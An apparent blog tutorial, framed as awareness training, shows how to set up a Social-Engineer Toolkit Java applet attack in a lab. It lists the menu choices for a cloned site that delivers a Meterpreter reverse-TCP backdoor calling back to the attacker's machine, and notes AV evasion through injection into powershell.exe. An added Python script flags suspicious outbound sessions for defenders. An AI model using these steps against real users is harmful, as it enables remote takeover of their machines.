As with all of my other tutorial hacking posts, this one is purely educational. This post is designed to increase awareness of malicious links by showing you exactly how a hacker might execute a browser-based attack.
When I explain hacking, I like to divide attacks into two categories: service-based attacks and client-based attacks. To figure out which category an attack falls into, ask the question, “Who initiated the malicious chain of events, the good guy or the bad guy?” If the bad guy initiated it, for example by brute-forcing the SQL Server ‘sa’ account, that is a service-based attack. If the good guy initiates the mayhem, for example by clicking a malicious link, that is a client-based attack.
This breakdown of all hacks makes perfect sense to telecom professionals, because of firewall rules. A firewall rule requires a direction, in or out. Service-based attacks come from outside the network in, and client-based attacks start inside the network and go out. Windows Firewall by default allows outbound connections, thus we have a problem: clients are allowed to click whatever filthy, stinking, grimy links they want. Let's get started on how an attacker might set up that trap (pun totally intended).
First, I recommend getting VMware Player and downloading the BackTrack VM. Use the bridged option in the VM networking settings for this test. Once logged in, use the menu to navigate to SET, the Social-Engineer Toolkit.
Once SET is loaded, it's simply a series of options you need to select to lay the trap. This trap is going to be a web server serving a page cloned from a valid website. The page is going to have Java code embedded that the user will probably have to approve to run. These are the options I selected:
1 social engineering attack
2 website attack vector
1 java applet attack method
2 site cloner
no, we're not NATing
enter the IP of the BackTrack VM: 10.10.10.107
2 Windows reverse_TCP Meterpreter
16 Backdoored Executable
port: press enter for the default
wait for “starting payload handler…”, which means it's ready! :]
Now go to your host machine, which probably has Java installed, open one of the many modern browsers and enter the IP: http://10.10.10.107
You should see all kinds of warnings that Google and Microsoft have put in to protect you. Unfortunately, these are generally ignored, especially if the attacker has piqued the user's curiosity. Once you have approved all the warnings, go back to your BackTrack VM. You should see some activity and, if you are lucky, an open session.
What this attack has done is run malicious code. My awesome virus scan picks up on that, but before I can click remove, the code has launched powershell.exe, injected itself into that process and fooled the virus scan. At least the pop-up will alert the user that bad stuff is about to happen or has already happened.
The backdoor makes an outbound HTTPS connection to the attacker's machine to allow Meterpreter to do its dirty work. You can see this connection if you run netstat on the victim:
TCP 10.10.10.100:2754 10.10.10.107:https ESTABLISHED
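As an added defender-side illustration (not part of the original post, and not SET or Metasploit code), the script below parses a constructed `netstat -ano` snapshot, classifies each ESTABLISHED session as outbound in the same firewall-direction sense used earlier (ephemeral local port dialling a service port), and flags sessions owned by a process such as powershell.exe that has no business holding one. The sample rows, PIDs and process names are made up; the script also accepts the post's own netstat line, which has a service name instead of a port number and no PID column.

```python
import re

# Service names netstat prints when run without -n (the post's line shows ":https").
SERVICE_PORTS = {"http": 80, "https": 443, "microsoft-ds": 445, "epmap": 135}

# Interpreters and living-off-the-land binaries that should not own an outbound
# session on a workstation; in the post the injected payload ends up in powershell.exe.
WATCHLIST = {"powershell.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}

# Constructed `netstat -ano` snapshot (not output from the post). The second row mirrors
# the connection the post shows, with a made-up PID added.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    10.10.10.100:2754      10.10.10.107:443       ESTABLISHED     3412
  TCP    10.10.10.100:2760      10.10.10.5:445         ESTABLISHED     4
  TCP    10.10.10.100:2771      93.184.216.34:443      ESTABLISHED     2280
"""

# Constructed PID -> image name map, as `tasklist` would report it.
SAMPLE_PROCESSES = {884: "svchost.exe", 3412: "powershell.exe", 4: "System", 2280: "firefox.exe"}

# Only TCP rows carry a State column, so UDP rows are skipped on purpose.
# The trailing PID group is optional so that `netstat` output without -o still parses.
NETSTAT_LINE = re.compile(
    r"^\s*TCP\s+(\S+):(\S+)\s+(\S+):(\S+)\s+(\S+)(?:\s+(\d+))?\s*$"
)


def _port(text):
    """Turn '443' or 'https' into an int; an unknown service name gives None."""
    return int(text) if text.isdigit() else SERVICE_PORTS.get(text.lower())


def parse_netstat(text):
    """Parse the TCP rows of Windows netstat output (with or without -n / -o)."""
    conns = []
    for line in text.splitlines():
        m = NETSTAT_LINE.match(line)
        if not m:
            continue
        laddr, lport, raddr, rport, state, pid = m.groups()
        conns.append({
            "local": laddr, "lport": _port(lport),
            "remote": raddr, "rport": _port(rport),
            "state": state, "pid": int(pid) if pid else None,
        })
    return conns


def is_outbound(conn):
    """Client-side connection in the post's terminology: this host dialled out.

    An ESTABLISHED session from an ephemeral local port to a well-known remote port is
    the shape of a connection that a default-allow-outbound firewall policy lets through.
    """
    return (conn["state"] == "ESTABLISHED"
            and conn["lport"] is not None and conn["lport"] >= 1024
            and conn["rport"] is not None and conn["rport"] < 1024)


def flag_suspicious(conns, processes, watchlist=WATCHLIST):
    """Return (image, pid, remote) for every outbound session owned by a watchlisted process."""
    findings = []
    for c in conns:
        if not is_outbound(c):
            continue
        image = processes.get(c["pid"], "unknown")
        if image.lower() in watchlist:
            findings.append((image, c["pid"], f"{c['remote']}:{c['rport']}"))
    return findings


if __name__ == "__main__":
    for image, pid, remote in flag_suspicious(parse_netstat(SAMPLE_NETSTAT), SAMPLE_PROCESSES):
        print(f"{image} (PID {pid}) holds an outbound session to {remote}")
```

The browser's own HTTPS session to a public address is deliberately left alone: the signal here is not port 443 but which image owns the socket, which is why netstat's -o column (or an EDR's process-to-socket mapping) matters more than the address list.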
The normal browser context is limited by UAC. If you run the browser as administrator, the malicious code runs as system and can migrate to other, very privileged processes.
I hope this lesson helps you avoid malicious links. Keep in mind, bad guys can do a lot of bad things to your computer, even take a picture of you. So make sure to smile when clicking sketchy links!